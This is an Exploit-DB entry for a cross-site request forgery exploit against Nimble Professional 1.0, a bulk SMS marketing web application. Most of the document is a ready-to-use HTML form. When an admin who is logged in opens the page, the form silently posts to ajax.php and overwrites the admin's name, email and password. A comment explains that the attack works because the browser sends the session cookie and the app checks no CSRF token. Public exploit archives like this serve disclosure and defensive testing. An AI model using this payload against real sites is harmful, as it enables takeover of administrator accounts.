Nimble Professional 1.0 – Cross-Site Request Forgery (Update Admin)

  • Author: Ihsan Sencan
    Date: 2017-09-11
  • Category: Webapps
    Platform:
  • Source: https://www.exploit-db.com/exploits/42648/
  • <!--
    # # # # # 
    # Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
    # Dork: N/A
    # Date: 11.09.2017
    # Vendor Homepage: http://ranksol.com/
    # Software Link: http://www.mojomarketplace.com/item/nimble-pro
    # Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # 
    # Proof of Concept:
    -->
    <html>
    <body>
    <!-- Served from an attacker-controlled page and opened by a logged-in admin: the browser
         attaches the admin's session cookie to this cross-site POST, and ajax.php accepts it
         without any anti-CSRF token, so the admin name, e-mail and password are overwritten. -->
    <label>Edit Profile:</label>
    <form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
    <label>Admin Name:</label>
    <input type="text" name="name" style="width: 400px;" value="Admin">
    <label>Admin Email:</label>
    <input type="text" name="email" style="width: 400px;" value="a@a.com">
    <label>Admin Password:</label>
    <input type="text" name="pass" style="width: 400px;" value="efe">
    <button type="submit" class="btn btn-success" >Save Profile</button>
    <input type="hidden" name="cmd" value="save_profile">
    </form>
    </body>
    </html>